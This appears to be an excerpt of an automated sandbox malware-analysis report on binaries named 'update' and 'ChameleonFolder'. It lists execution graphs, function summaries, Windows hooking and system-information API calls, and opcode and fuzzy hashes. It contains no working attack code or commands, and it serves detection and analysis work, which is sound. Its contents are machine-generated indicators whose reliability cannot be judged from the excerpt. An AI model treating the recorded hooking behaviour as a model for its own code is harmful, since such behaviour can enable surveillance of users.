                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vba$Move$Free$#660#713ChkstkList
                                                                                                                                        • String ID: 0G
                                                                                                                                        • API String ID: 3935290791-2664342302
                                                                                                                                        • Opcode ID: 19e66fbb10b2bb43d777cdc754d8bacc1834d9e39c83e46fdc65c78a7ba013b2
                                                                                                                                        • Instruction ID: a6c87352a10bd0c29c3dfee56bbfc3ddada56146144d5d3d0ad4118cfd3d6f8d
                                                                                                                                        • Opcode Fuzzy Hash: 19e66fbb10b2bb43d777cdc754d8bacc1834d9e39c83e46fdc65c78a7ba013b2
                                                                                                                                        • Instruction Fuzzy Hash: 2831CFB1900218AADB11DBA1CD45FCEB7BCAB08744F5041ABB209F7191DB785B488F65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:28
                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                        execution_graph 24957 340af3c 24958 340af44 24957->24958 24960 340af80 24958->24960 24961 34095fc 24958->24961 24963 340960b 24961->24963 24964 3409621 24961->24964 24963->24964 24965 34095b4 24963->24965 24964->24960 24966 34095c4 24965->24966 24968 34095e0 24965->24968 24969 340a82c 24966->24969 24968->24964 24970 340a86d 24969->24970 24973 340a708 24970->24973 24972 340a8a6 24972->24968 24975 340a729 24973->24975 24974 340a7a4 24974->24972 24975->24974 24979 3409df4 24975->24979 24977 340a7c0 24977->24974 24978 3409df4 6 API calls 24977->24978 24978->24974 24980 3409e17 24979->24980 24982 3409e20 24980->24982 24983 3409cd8 6 API calls 24980->24983 24982->24977 24983->24982 24984 3499904 24985 3499937 24984->24985 24986 3499917 SetWindowsHookExW 24984->24986 24987 3499941 SetWindowsHookExW 24985->24987 24988 3499975 KiUserCallbackDispatcher 24985->24988 24986->24985 24987->24988 24989 3499963 24988->24989 24990 3499991 24988->24990 24989->24988 24989->24990

                                                                                                                                        Executed Functions

                                                                                                                                        Function 03499904 Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 59 3499904-3499915 60 3499937-349993f 59->60 61 3499917-3499934 SetWindowsHookExW 59->61 62 3499941-3499961 SetWindowsHookExW 60->62 63 3499975-3499986 KiUserCallbackDispatcher 60->63 61->60 62->63 64 3499988-349998f 63->64 65 3499991-349999c 63->65 64->65 66 3499963-349996f 64->66 66->63
                                                                                                                                        APIs
                                                                                                                                        • SetWindowsHookExW.USER32(00000007,03499790,034A6C54,00000000), ref: 03499927
                                                                                                                                        • SetWindowsHookExW.USER32(00000005,0349988C,034A6C54,00000000), ref: 03499951
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0349997F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003411000.00000020.00000001.01000000.00000010.sdmp, Offset: 03411000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3411000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HookWindows$CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 59075224-0
                                                                                                                                        • Opcode ID: 685e130905317b8e8f6afe195771f31ed4ba061e5c57b91f5435b7954a9be54b
                                                                                                                                        • Instruction ID: 60105d89684bf7f5edddc2ba71d166735eb5175ea4c45a825bf341a25a05d8fe
                                                                                                                                        • Opcode Fuzzy Hash: 685e130905317b8e8f6afe195771f31ed4ba061e5c57b91f5435b7954a9be54b
                                                                                                                                        • Instruction Fuzzy Hash: 52110074A51608AFEB50EE68D885F5A7BEDAB09300F44415BA504EF3C4D774E940CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0058A22E Relevance: .0, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 314 58a22e-58a23e 316 58a279-58a27d 314->316 317 58a240-58a249 314->317 317->316 318 58a24b-58a265 call 589e78 317->318 320 58a26a 318->320 321 58a270-58a272 320->321 321->316
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.510122696.0000000000589000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00589000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_589000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4febe0eb4d84dd83019475e959ff80df768adc17356b2f847f0a26c6c8f5c2da
                                                                                                                                        • Instruction ID: 3cd3905165a61f5e59cbd3627ab8ae1ec89f996e675b9aa447411af0897815f2
                                                                                                                                        • Opcode Fuzzy Hash: 4febe0eb4d84dd83019475e959ff80df768adc17356b2f847f0a26c6c8f5c2da
                                                                                                                                        • Instruction Fuzzy Hash: 19F055223043A4A7DB11AAAE6C4097EBBDCAB823607088127BC44C7302C939CE02C6A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0058A230 Relevance: .0, Instructions: 32COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 334 58a230-58a23e 335 58a279-58a27d 334->335 336 58a240-58a249 334->336 336->335 337 58a24b-58a26a call 589e78 336->337 340 58a270-58a272 337->340 340->335
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.510122696.0000000000589000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00589000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_589000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f52bc3c0e91d2b20c49cc3c2efc9167d6dab231f5c988c19ea67b3c5103d18ef
                                                                                                                                        • Instruction ID: 27ed2c645dccc415537787f1760b60616f35f9b11116cc2e6520bbea6ad492ff
                                                                                                                                        • Opcode Fuzzy Hash: f52bc3c0e91d2b20c49cc3c2efc9167d6dab231f5c988c19ea67b3c5103d18ef
                                                                                                                                        • Instruction Fuzzy Hash: 7DF055222043A4A7CB11AAAE6C4096EBBDCAB823607088127BC44C7302C939CE02C6A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0058A21C Relevance: .0, Instructions: 8COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.510122696.0000000000589000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00589000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_589000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4b4d7f323154e559991fb84886ae50a6ce2d6ce784a5ca9b00dcce846ff2354c
                                                                                                                                        • Instruction ID: a7460d77dff2dd95a8ac96394b932783a8c89b8b75b6c65392c8c15b29cb42b5
                                                                                                                                        • Opcode Fuzzy Hash: 4b4d7f323154e559991fb84886ae50a6ce2d6ce784a5ca9b00dcce846ff2354c
                                                                                                                                        • Instruction Fuzzy Hash: E7B012D240C2E815822132F70CD0C227EDC388E13234901C3B1D109063401D81006730
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 03405E5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405E8B
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,03405F08,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405EBF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003401000.00000020.00000001.01000000.00000010.sdmp, Offset: 03401000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3401000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationLogicalProcessor
                                                                                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                                                                                        • API String ID: 1773637529-812649623
                                                                                                                                        • Opcode ID: aa91f65f8416348e7abb785a22ed02b1da941e0516a59d500c9f3db4d5ef8782
                                                                                                                                        • Instruction ID: e03fee18bcfcd64f96d7644ccdacf28a7897612d76c289a2c4c171887129f298
                                                                                                                                        • Opcode Fuzzy Hash: aa91f65f8416348e7abb785a22ed02b1da941e0516a59d500c9f3db4d5ef8782
                                                                                                                                        • Instruction Fuzzy Hash: 5A11B975B0C304AEDB10EFA5CD81A5EBBF8DB41210F2840FBE5149E2C1DB399980CA5C
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 03405E5A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405E8B
                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,03405F08,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 03405EBF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003401000.00000020.00000001.01000000.00000010.sdmp, Offset: 03401000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3401000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationLogicalProcessor
                                                                                                                                        • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                                                                                        • API String ID: 1773637529-812649623
                                                                                                                                        • Opcode ID: 75712dd5e85783118795c49f65b62ec2b2186a10ce64043448e43601787c2c1f
                                                                                                                                        • Instruction ID: 64de95a941b216550bdc03a655004f7305e38d5dadc91d3d4c84d6a0911632ff
                                                                                                                                        • Opcode Fuzzy Hash: 75712dd5e85783118795c49f65b62ec2b2186a10ce64043448e43601787c2c1f
                                                                                                                                        • Instruction Fuzzy Hash: 6B014475B0C3046EDB20EFA58D85A6EBBADDB01214F1840FBE514DE2C1EB759980CA5D
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 03409CD8 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 03409CE9
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 03409D47
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 03409DA4
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 03409DD7
                                                                                                                                          • Part of subcall function 03409C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,03409D55), ref: 03409CAB
                                                                                                                                          • Part of subcall function 03409C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,03409D55), ref: 03409CC8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.518805679.0000000003401000.00000020.00000001.01000000.00000010.sdmp, Offset: 03401000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_3401000_ChameleonFolder.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2255706666-0
                                                                                                                                        • Opcode ID: da417f06bfa68947eef6e04ccaa54a63b1d62e1c3534636c2b4d0f922754abd0
                                                                                                                                        • Instruction ID: 84303a4cd91cbd0e55cec5a04227f2a80a6f9beea75fca5f7dcac1deb47e6be6
                                                                                                                                        • Opcode Fuzzy Hash: da417f06bfa68947eef6e04ccaa54a63b1d62e1c3534636c2b4d0f922754abd0
                                                                                                                                        • Instruction Fuzzy Hash: 55315B74B0022A9FCB10EFA5C884AAEB7F9EF04310F04457AD525EF2E5EB749A04CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%